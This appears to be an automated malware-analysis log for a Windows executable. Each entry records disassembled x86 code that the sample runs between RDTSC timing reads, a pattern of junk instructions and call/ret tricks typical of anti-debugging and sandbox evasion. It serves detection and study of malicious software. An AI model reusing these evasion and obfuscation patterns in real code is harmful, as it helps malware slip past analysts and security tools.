Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36CEFC second address: 36CF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F4AE04F8895h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4AE04F8888h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a sub dword ptr [ebp+1245ECD6h], ebx 0x00000030 push 00000000h 0x00000032 xor edi, 5F051F8Ah 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F4AE04F8888h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 mov edi, dword ptr [ebp+122D1933h] 0x0000005a xchg eax, ebx 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36CF80 second address: 36CF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36CF86 second address: 36CF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36CF8F second address: 36CFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F4AE0E87EBBh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36D9DE second address: 36D9E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 371537 second address: 37154A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jp 00007F4AE0E87EBCh 0x0000000d jl 00007F4AE0E87EB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37154A second address: 371550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 371550 second address: 371554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 371554 second address: 37157C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F4AE04F8890h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3303C9 second address: 3303D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 371BB8 second address: 371BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 371BBC second address: 371BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 372608 second address: 37260E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37260E second address: 372612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3762D5 second address: 3762D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3762D9 second address: 3762DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3787AD second address: 3787B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4AE04F8886h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37A6C7 second address: 37A6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37A6CB second address: 37A6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3799C8 second address: 3799DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4AE0E87EC0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37A6D1 second address: 37A6DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4AE04F8886h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37B748 second address: 37B74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37B89B second address: 37B8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4AE04F8899h 0x00000008 jbe 00007F4AE04F8886h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F4AE04F8886h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37B8CA second address: 37B94A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c sub dword ptr [ebp+12478F07h], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 movsx edi, bx 0x00000023 mov eax, dword ptr [ebp+122D05E1h] 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F4AE0E87EB8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov bl, B5h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F4AE0E87EB8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 stc 0x00000062 mov ebx, dword ptr [ebp+12479033h] 0x00000068 nop 0x00000069 push ebx 0x0000006a ja 00007F4AE0E87EBCh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37C94F second address: 37C954 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D7BA second address: 37D859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F4AE0E87EB8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov dword ptr [ebp+12460946h], edi 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b or dword ptr [ebp+12489A32h], edx 0x00000041 mov eax, dword ptr [ebp+122D1739h] 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007F4AE0E87EB8h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 sub dword ptr [ebp+12460C4Dh], eax 0x00000067 or dword ptr [ebp+12458A21h], esi 0x0000006d push FFFFFFFFh 0x0000006f ja 00007F4AE0E87EBAh 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F4AE0E87EBCh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37E808 second address: 37E80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D859 second address: 37D860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37E80C second address: 37E812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D860 second address: 37D86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D86E second address: 37D872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D872 second address: 37D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D878 second address: 37D87E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37D87E second address: 37D882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 381636 second address: 381649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4AE04F888Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 381649 second address: 38164D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37F7D3 second address: 37F7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37F7D7 second address: 37F7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 37F7DB second address: 37F7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 38264D second address: 382653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 382653 second address: 382658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3817AD second address: 3817B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 382658 second address: 3826C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F4AE04F8888h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 and bx, 6243h 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D194Bh], ebx 0x00000031 mov ebx, 5558388Fh 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F4AE04F8888h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3826C4 second address: 3826DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE0E87EC2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3826DB second address: 3826E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3828D8 second address: 3828E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4AE0E87EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3846A3 second address: 3846A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3838AE second address: 3838BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 383986 second address: 38398A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 38398A second address: 383998 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 383998 second address: 38399C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 38485B second address: 384869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 384869 second address: 38486D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 385921 second address: 385925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 38DB5B second address: 38DB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F8892h 0x00000009 jmp 00007F4AE04F888Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31C233 second address: 31C239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31C239 second address: 31C23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31C23D second address: 31C241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 391E7D second address: 391E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 391E82 second address: 391E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 391E88 second address: 391EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a jmp 00007F4AE04F8893h 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jl 00007F4AE04F8894h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 391EB5 second address: 391EC5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 392024 second address: 392046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jne 00007F4AE04F8886h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 392046 second address: 392072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F4AE0E87EC2h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 392072 second address: 392076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 392076 second address: 1AEB8B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4AE0E87EBCh 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F4AE0E87EBEh 0x00000019 pop eax 0x0000001a jmp 00007F4AE0E87EC9h 0x0000001f push dword ptr [ebp+122D0099h] 0x00000025 jmp 00007F4AE0E87EC4h 0x0000002a call dword ptr [ebp+122D1859h] 0x00000030 pushad 0x00000031 add dword ptr [ebp+122D194Bh], edi 0x00000037 xor eax, eax 0x00000039 jmp 00007F4AE0E87EBEh 0x0000003e je 00007F4AE0E87EB7h 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 mov dword ptr [ebp+122D194Bh], eax 0x0000004e mov dword ptr [ebp+122D3992h], eax 0x00000054 jg 00007F4AE0E87EC2h 0x0000005a jp 00007F4AE0E87EBCh 0x00000060 mov esi, 0000003Ch 0x00000065 jmp 00007F4AE0E87EBBh 0x0000006a xor dword ptr [ebp+122D194Bh], eax 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 jc 00007F4AE0E87EB7h 0x0000007a cld 0x0000007b lodsw 0x0000007d js 00007F4AE0E87EB7h 0x00000083 clc 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 pushad 0x00000089 movzx edi, cx 0x0000008c mov edi, 2FB83D5Fh 0x00000091 popad 0x00000092 mov ebx, dword ptr [esp+24h] 0x00000096 clc 0x00000097 push eax 0x00000098 push ebx 0x00000099 push eax 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 39383E second address: 393842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 393842 second address: 393846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3993CE second address: 3993E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE04F888Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3993E1 second address: 3993E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 367F0B second address: 367F18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3681DA second address: 3681DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368454 second address: 36845E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368554 second address: 36855D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368C88 second address: 368CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368EB7 second address: 368EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368EBC second address: 368F0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8896h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F4AE04F8888h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 cmc 0x00000027 lea eax, dword ptr [ebp+1248CAD4h] 0x0000002d mov dword ptr [ebp+122D2DC7h], edx 0x00000033 nop 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F0E second address: 368F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 368F12 second address: 368F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
